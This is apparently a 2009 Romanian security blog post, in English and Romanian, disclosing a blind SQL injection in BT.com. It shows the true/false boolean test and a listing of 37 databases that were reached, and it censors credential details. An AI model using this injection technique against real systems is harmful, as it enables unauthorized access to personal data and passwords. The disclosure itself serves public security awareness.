United
- Yahoo! again - XSS in Uncategorized (357 Visits)
- Yahoo! again - bad settings? in Uncategorized (252 Visits)
- Fanii nostri in Uncategorized (183 Visits)
- Frustrant in Uncategorized (146 Visits)
- La multi ani România, la multi ani românilor in Uncategorized (137 Visits)
- Weblog.ro - Shell via Local File Inclusion in Uncategorized (119 Visits)
- Yahoo! epic fail - permanent xss unleashed in Uncategorized (50 Visits)
- ... in Uncategorized (38 Visits)
- XSS Ownage - hi5 vs. Yahoo! + video in Uncategorized (2 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/Hi5 (4) in Uncategorized (2 Visits)
- Ce servicii de mail folositi? in (121 Visits)
- Azi este ziua userilor hackersblog.org in (120 Visits)
- De reţinut in (117 Visits)
- Inca o pierdere de timp in (107 Visits)
- De tinut minte in (106 Visits)
- Twitter in (78 Visits)
- Un nou membru in (74 Visits)
- Interviu la Radio Lynx in (70 Visits)
- 2009 in (51 Visits)
- Editori noi. in (35 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/mail (2) in (199 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam (1) in (139 Visits)
- Ce nu se invata la scoala - (D)DOS (5) in (104 Visits)
- B7ackAnge7z (1)
- Nicu Calcea (1)
- andrasi zsolt (1)
- Ovidiu U (1)
- Dumitru (1)
- Andrei Rinea (1)
Posted on March 10th, 2009
We kept on hold the publication of the vulnerable parameter which would allow full access in ALL the databases of the main server, waiting for the issue to be solved. Today, all the vulnerable pages have been taken offline for maintenance and security testing and thus, we will continue with the full disclosure.
Because this was a blind Sql Injection, I cannot show you the results of the injection from the web page. I made two screenshots, showing that the parameter is vulnerable. In the first pic you can see that if you are using AND+1 = 1, which is always true, the entire content is displayed:
In the second pic were we use AND+1=2, which is always false, the page does not load.
Now, lets see which databases did we gain access to:
available databases [37]:
[*] BT
[*] BT_Argos
[*] BT_BB_Anywhere
[*] BT_BBAndLine
[*] BT_BroadbandOpenzone
[*] BT_Bundling
[*] BT_CallMeArgos
[*] BT_CallSave
[*] BT_CallSaveStaff
[*] BT_comparebroadband
[*] BT_dabsCallback
[*] BT_DigitalVaultPlus
[*] BT_DisneyComp
[*] BT_HomeITCall
[*] BT_HomeITInstall
[*] BT_ITCalculator
[*] BT_Main
[*] BT_MobilePicker_Flexible
[*] BT_NetProtectOrder
[*] BT_ppc
[*] BT_PrinceCaspian
[*] BT_recontracting
[*] BT_RecontractingGenZ
[*] BT_SecureAdmin
[*] BT_SimOffer
[*] BT_Tactical_oneclick
[*] BT_TellAFriend
[*] BT_Tinkerbell
[*] BT_TotalBroadband
[*] BT_VisionOrderJourney
[*] BTM00585
[*] Crayon_Utility
[*] master
[*] MobilePortal
[*] model
[*] msdb
[*] tempdb
First database “BT” is the most interesting one. Nonetheless, the others also yeld a wealth of important data about the users: personal data, passwords, etc.
The user and [censored for security reasons] can be easily extracted. They contain login data for different data bases (default_censored for security reasons). You can extract name and passwords for sysusers just as well. They give us direct access to the server.
Database: m*****
Table: s*****
[18 columns]
+————-+———–+
| Column | Type |
+————-+———–+
(Content removed for security reasons)
This blind SQL Injection grants us way more access to larger parts of the databases then the one used to find the previous vulnerability in BT.com. Using this vulnerability an attacker can access personal data of the users.
Dont rush to conclusions and start pointing figers before you see the next articles where we will show similar issues with other large telecommunication providers. As we said earlier, we dont take sides, but rather, want to show that the above mentioned vulns cand be found almost everywhere.
We would like to thank BT.com for the fair-play and manners they displayed in addressing this issue in the email we got from them.
We appreciate and support the mature and to the point attitude they have. It is very important for us.
————-
RO Version:
Am asteptat publicarea parametrului vulnerabil, care permitea full acces in TOATE bazele de date ale serverului principal, pana cei in cauza rezolva problema. Azi au fost trecute pe “offline” toate paginile vulnerabile pentru a se efectua testele de securitate si noi putem continua articolul precedent.
Fiind vorba de un blind sql injection nu va pot arata in imagini rezultatele injectiei din pagina web. Am facut doar doua screenshot-uri, din care reiese clar ca parametrul este vulnerabil. In prima poza se vede cum impunand conditia de baza AND+1=1, care este mereu adevarata, se incarca tot content-ul:
Iar in poza 2-a unde impunem conditia AND+1=2, care este totdeauna falsa, nu se incarca pagina.
Acum sa vedem la ce baze de date avem acces:
available databases [37]:
[*] BT
[*] BT_Argos
[*] BT_BB_Anywhere
[*] BT_BBAndLine
[*] BT_BroadbandOpenzone
[*] BT_Bundling
[*] BT_CallMeArgos
[*] BT_CallSave
[*] BT_CallSaveStaff
[*] BT_comparebroadband
[*] BT_dabsCallback
[*] BT_DigitalVaultPlus
[*] BT_DisneyComp
[*] BT_HomeITCall
[*] BT_HomeITInstall
[*] BT_ITCalculator
[*] BT_Main
[*] BT_MobilePicker_Flexible
[*] BT_NetProtectOrder
[*] BT_ppc
[*] BT_PrinceCaspian
[*] BT_recontracting
[*] BT_RecontractingGenZ
[*] BT_SecureAdmin
[*] BT_SimOffer
[*] BT_Tactical_oneclick
[*] BT_TellAFriend
[*] BT_Tinkerbell
[*] BT_TotalBroadband
[*] BT_VisionOrderJourney
[*] BTM00585
[*] Crayon_Utility
[*] master
[*] MobilePortal
[*] model
[*] msdb
[*] tempdb
Prima baza de date “BT” este cea mai interesanta, dar si celalalte ne ofera detalii importante despre utilizatori: date personale, parole, etc.
Se pot extrage cu usurinta name si [cenzurat din motive se securitate] care contin datele de logare pentru diferitele baze de date (default_cenzurat din motive se securitate). La fel de usor se pot extrage si name, password pentru sysusers. Aceste date ne permit logarea directa pe server.
Database: m*****
Table: s*****
[18 columns]
+————-+———–+
| Column | Type |
+————-+———–+
Continut inlaturat din motive de securitate
Accesul pe care ni-l da acest blind sql injection este mult mai mare decat cel oferit de vulnerabilitatea precedenta din BT.com. Folosindu-se de aceasta vulnerabilitate un atacator putea accesa datele personale ale utilizatorilor.
Nu va grabiti sa ii acuzati inainte de a vedea si urmatoarele articole referitoare la alti mari provideri in telecomunicatii. Asa cum am mai spus si inainte noi nu facem discriminari si incercam sa aratam ca vulnerabilitatile prezentate se pot intalni la scara larga.
Le multumim celor de la BT.com pentru fair-play-ul aratat in mailul pe care ni l-au trimis. Apreciem astfel de raspunsuri mature si la obiect si conteaza foarte mult pentru noi cand ni se multumeste.
March 10th, 2009 at 11:07 pm
…ma intreb ce ar face altii in locul vostru , black…? si ce se va intampla dupa ce o sa va retrageti voi ? Apropo , chiar merita , aveti niste avantaje pt ceeia ce faceti?!:) toate bune…m2k
March 11th, 2009 at 5:11 am
“Apropo , chiar merita , aveti niste avantaje pt ceeia ce faceti?!:)”
e ca și cum ați fi angajați la firmele astea numai că nu primiți salariu. le reparați site-urile gratuit. frumos
March 11th, 2009 at 9:54 am
Care-i ideea cu “The user and [censored for security reasons] can be easily extracted. “? E dubios, ce v-a venit?
March 11th, 2009 at 10:05 am
Datele respective pot ajuta pe cine nu trebuie in cazul unui potential atac. Vorbim de enorm de multe persoane ce pot fi afectate de un asemenea atac. Nu ne place sa ne jucam cu vietile oamenilor.
March 17th, 2009 at 9:00 am
[...] non solo ha ribattuto alla tesi “minimalista” della compagnia inglese ma ha addirittura rilanciato il problema. Nell’aggiornamento della vicenda, viene evidenziata un’altra [...]